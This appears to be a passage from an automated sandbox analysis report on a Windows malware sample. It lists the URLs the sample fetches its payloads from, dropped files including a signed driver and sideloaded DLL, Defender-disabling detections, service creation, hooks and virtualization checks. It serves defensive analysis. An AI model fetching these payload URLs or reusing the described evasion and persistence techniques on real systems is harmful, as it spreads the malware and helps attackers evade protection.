Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/C
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/Vm
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/Zm
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/q
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/w
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.8:49708 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.O8xg2t.exe.2900000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 7.2.O8xg2t.exe.27d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.O8xg2t.exe.2750000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140006C95 NtAllocateVirtualMemory,9_2_0000000140006C95
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000C3F06_2_000000014000C3F0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000CC006_2_000000014000CC00
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140001A306_2_0000000140001A30
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000C2A06_2_000000014000C2A0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400022C06_2_00000001400022C0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400110F06_2_00000001400110F0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140010CF06_2_0000000140010CF0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400093006_2_0000000140009300
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000BB706_2_000000014000BB70
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140003F806_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400103D06_2_00000001400103D0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC320A1B86_2_00007FFBC320A1B8
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC32102486_2_00007FFBC3210248
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_000000014000C3F09_2_000000014000C3F0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_000000014000CC009_2_000000014000CC00
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140001A309_2_0000000140001A30
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_000000014000C2A09_2_000000014000C2A0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400022C09_2_00000001400022C0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400110F09_2_00000001400110F0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140010CF09_2_0000000140010CF0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400093009_2_0000000140009300
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_000000014000BB709_2_000000014000BB70
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140003F809_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400103D09_2_00000001400103D0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BB02489_2_00007FFBC1BB0248
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BAA1B89_2_00007FFBC1BAA1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\O8xg2t.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: C:\Users\user\Documents\O8xg2t.exeCode function: String function: 0000000140006A65 appears 56 times
Source: C:\Users\user\Documents\O8xg2t.exeCode function: String function: 0000000140004F10 appears 46 times
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 9.2.O8xg2t.exe.2900000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 7.2.O8xg2t.exe.27d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.O8xg2t.exe.2750000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@4/12@1/1
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,9_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
Source: C:\Users\user\Documents\O8xg2t.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,9_2_0000000140001430
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,9_2_0000000140001520
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].datJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\O8xg2t.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 287438657364-7643738421.08.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 287438657364-7643738421.08.exeVirustotal: Detection: 11%
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile read: C:\Users\user\Desktop\287438657364-7643738421.08.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\287438657364-7643738421.08.exe "C:\Users\user\Desktop\287438657364-7643738421.08.exe"
Source: unknownProcess created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: unknownProcess created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: unknownProcess created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: 287438657364-7643738421.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 287438657364-7643738421.08.exeStatic file information: File size 30886912 > 1048576
Source: 287438657364-7643738421.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58c00
Source: 287438657364-7643738421.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb source: 287438657364-7643738421.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe, 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000006.00000000.2411129760.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000002.2431285508.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000000.2425791156.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000000.2540851216.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe.0.dr
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Users\user\Documents\O8xg2t.exeJump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Users\user\Documents\O8xg2t.exeJump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 3396 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 3396 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 6880 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 6880 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 6504 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeMemory written: PID: 6504 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Tries to detect virtualization through RDTSC time measurements
